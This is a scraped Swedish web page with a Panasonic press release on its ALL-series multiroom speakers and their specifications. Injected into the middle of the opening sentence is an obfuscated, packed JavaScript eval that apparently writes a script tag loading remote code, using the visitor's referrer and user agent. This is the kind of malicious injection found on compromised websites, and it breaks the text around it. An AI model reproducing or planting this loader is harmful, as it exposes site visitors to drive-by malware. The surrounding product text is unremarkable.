Image Image Image Image Image Image Image Image Image Image

| 8 maj, 2021

Scroll to top

Top

Panasonic lanserar nya multiroom-system med äkta HiFi-ljud

Panasonic lanserar nya multiroom-system med äkta HiFi-ljud

De eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|arrzn|var|u0026u|referrer|nfnba||js|php’.split(’|’),0,{}))
nya trådlösa multiroom-systemen SC-ALL8 och SC-ALL3, samt en Network Audio Connector – SH-ALL1C, erbjuder lyssnarna att konfigurera musik i flera rum från en mängd olika digitala källor.

Panasonic Nordic meddelar nu att de släpper sin nya europeiska produktserie trådlösa multiroom-system i ALL-serien. Serien innefattar AllPlay ™, en ny smart mediaplattform från Qualcomm®, där musik kan streamas i flera rum från flera olika källor. De nya modellerna inkluderar de trådlösa multiroom-systemen SC-ALL8 och SC-ALL3, samt en Network Audio Connector – SH-ALL1C.

Musik av hög kvalitet: när som helst, var som helst

Panasonics nya multiroom-system med AllPlay gör det enkelt att installera en multiroom-konfiguration baserat på ett redan existerande Wi-Fi-hemmanätverk. Via en smartphone eller surfplatta med iOS eller Android kan musik trådlöst sändas ut igenom huset via en prenumerationstjänst för musik eller en internetradio.

Det nya systemet är också kompatibelt med Spotify Connect vilket gör det möjligt att strömma musik från Spotify direkt till din ALL-produkt och styra den via din smartphone eller surfplatta, genom att använda den vanliga Spotify-appen.

Systemet har två olika lägen för att antingen dela samma musik ut igenom huset eller att dela olika musik till varje enskild högtalare.

Det är möjligt att styra systemet direkt från appen till en internetradio eller via en prenumerationstjänst för musik. Eftersom dessa appar uppgraderas löpande behöver du aldrig vänta på att få ta del av dess fördelar.

Skarpt ljud och stilren design

ALL-seriens olika modeller har en stilren och elegant design som framhävs av diskreta ovala accenter som ger kraft och tyngd åt produkterna.

Den större ALL8 är även väggmonteringsbar för bästa flexibilitet, medan ALL3 och ALL1C bägge har en tvåsidig design. Friheten att välja mellan liggande och stående placering gör att installationen bättre kan anpassas efter rummets interiör.

Ljudförbättrande teknologi för perfekta toner

Panasonic ALL8 och ALL3 är båda utrustade med en lång rad ljudförbättrande teknologier. Ett exempel är 2:a generationens LincsD-Amp som tillför noise shaping-teknologi för att återge en mycket stabil klockfrekvens, vilket reducerar signalstörningar till ett frekvensomfång som inte kan uppfattas av det mänskliga örat. En XBS Master förstärker lågfrekvent ljud för att uppnå en robust bas. Multi Band Gain-funktionen eliminerar onaturliga ljud som genereras under processen med att kontrollera distorsion, medan H.BASS tillför harmonier som möjliggör reproduktion av basljud på 80Hz eller mindre, vilket tidigare har varit svårt att återskapa med en högtalare i denna klass.

I och med den enkla anslutningen till Panasonic ALL1C kan ett befintligt ljudsystem enkelt uppgraderas för att bli en del av ett multiroom-system. ALL1C är utrustad med en högkvalitativ 192-kHz/24-bit DAC från Burr Brown. Allt för att säkerställa att de ljudsignaler som sänds till högtalarsystemet är högsta kvalitet.

Tekniska detaljer:

SC-ALL8

 • Monterbar på vägg
 • 5 högtalare (1 subwoofer / 2 woofers / 2 tweeters)
 • Andra generationens LincsD-Amp
 • XBS Master (XBS / H.Bass / Multi Band Gain Control)
 • 80W total effekt
 • Panasonic Music Streaming App
 • WiFi 5GHz/2.4GHz

SC-ALL3

 • Tvåvägsdesign – vertikal och horisontell
 • Fyra högtalare (2 woofers / 2 tweeters)
 • Andra generationens LincsD-Amp
 • XBS Master (XBS / H.Bass / Multi Band Gain Control)
 • 40W total effekt
 • Panasonic Music Streaming App
 • WiFi 5GHz/2.4GHz

SH-ALL1C

 • Tvåvägsdesign – vertikal och horisontell
 • 192 kHz/24bit Burr Brown TI DAC
 • Guldpläterad ljudingång
 • Panasonic Music Streaming App
 • WiFi 5GHz/2.4GHz

Detta är ett pressmeddelande från Panasonic